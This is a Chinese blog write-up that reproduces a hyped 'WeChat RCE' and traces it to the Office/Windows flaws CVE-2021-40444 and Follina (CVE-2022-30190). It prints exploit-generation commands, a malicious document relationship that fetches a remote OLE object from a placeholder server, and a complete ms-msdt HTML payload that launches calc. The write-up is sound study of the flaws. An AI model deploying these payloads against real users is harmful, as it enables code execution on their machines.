标题党:震惊!!!微信RCE!!!
2023-2-23 11:28:52 Author: 瑞不可当(查看原文) 阅读量:33 收藏

先来简单看一下效果

故事背景

话说上周五的时候,本人关注的微信公众号上面突然开始刷屏微信爆出RCE,仔细研读了一下大神们的文章看明白了大致的思路。

1.手机和电脑同时登录微信

2.收到一个夹带私货的word文档

3.在手机上点击“在电脑上打开”

4.电脑自动打开word并触发脚本打开计算器

Amazing啊,我就是一个大写的Amazing,咱就是说,我如果直接在电脑端打开这个文件是不是也是这个效果呢,用手机点一下在电脑中打开是一个什么神奇的中转。其实还是CVE-2021-40444的一种利用方式。究其根本还是需要满足CVE-2021-40444的利用条件。

复现

第一步我们先来大致看看微信“在电脑上打开“的逻辑,对于普通的文件,调用explore直接打开文件下载的路径,然后由用户选择打开方式,对于word文件,直接调用office软件打开,这其实就是一个微信的特性或者说功能。

第二步构造带有POC的word文件,因为环境搭建的问题,笔者使用上文中提到的CVE-2021-40444时触发不成功,搞得我都怀疑我新安装的虚拟机windows给我免费杀毒没给我装计算器呢,言归正传怀疑是windows版本的问题,所以用了一个该漏洞的变种,CVE-2022-30190。但是这里使用的POC是CVE-2021-40444的POC生成工具生成的。

使用命令python3 exploit.py generate test/calc.dll http://你服务器的IP地址就可以无脑生成一个可以打开受害者计算机的计算器软件的POC了。

从上述的图片中我们可以看到在word/_rels/目录下有一个document.xml.rels文件,可以简单看一下这个文件,倒数第三个标签内ole对象远程拉取恶意的html文件就是触发RCE的元凶了。

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">    <Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/>    <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/>    <Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/>    <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/>    <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>    <Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://xx.xx.xx.xx/cve-2021-40444.html!x-usc:http://xx.xx.xx.xx/cve-2021-40444.html" TargetMode="External"/>    <Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.wmf"/>    <Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/></Relationships>

第三步正常的CVE-2021-40444的利用步骤是在你刚刚生成word时输入的IP上使用sudo python3 exploit.py host 80开启一个web服务,然后打开word文档就会自动加载远程资源,服务器端显示如下

但是笔者因为版本问题使用了CVE-2022-30190,利用起来也不复杂,word文档不需要修改,直接使用刚刚生成的就可以,然后自己起一个web服务,然后新建一个word.html,html文件如下,其中使用了ms-msdt协议,该协议是Microsoft Support Diagnostics Tool 的缩写,它是一种实用程序,用于排除故障并收集诊断数据以支持专业人员分析以解决问题,其可以调用本地脚本,而不触发office的保护视图,从而导致代码执行。

<html><script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc)/.exe\"";// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</script>
</html>

在受害者机器上打开word文档,可以看到word自动请求了我们构造的恶意html文档,就可以实现文章最开始的视频效果了。

总结

回顾一下其实最终触发RCE的还是windows系统本身的漏洞,微信只是充当了一个传播介质,微信感觉很冤枉,你抓的是鲁迅跟我周树人有什么关系。


文章来源: http://mp.weixin.qq.com/s?__biz=MzkzODI1NjMyNQ==&mid=2247484299&idx=1&sn=3ca17c736e53f48276202a60c883a7f7&chksm=c283b121f5f4383776909d9805676f7a4518469299e5cc8abf868bac62966f515f3a00631621#rd
如有侵权请联系:admin#unsafe.sh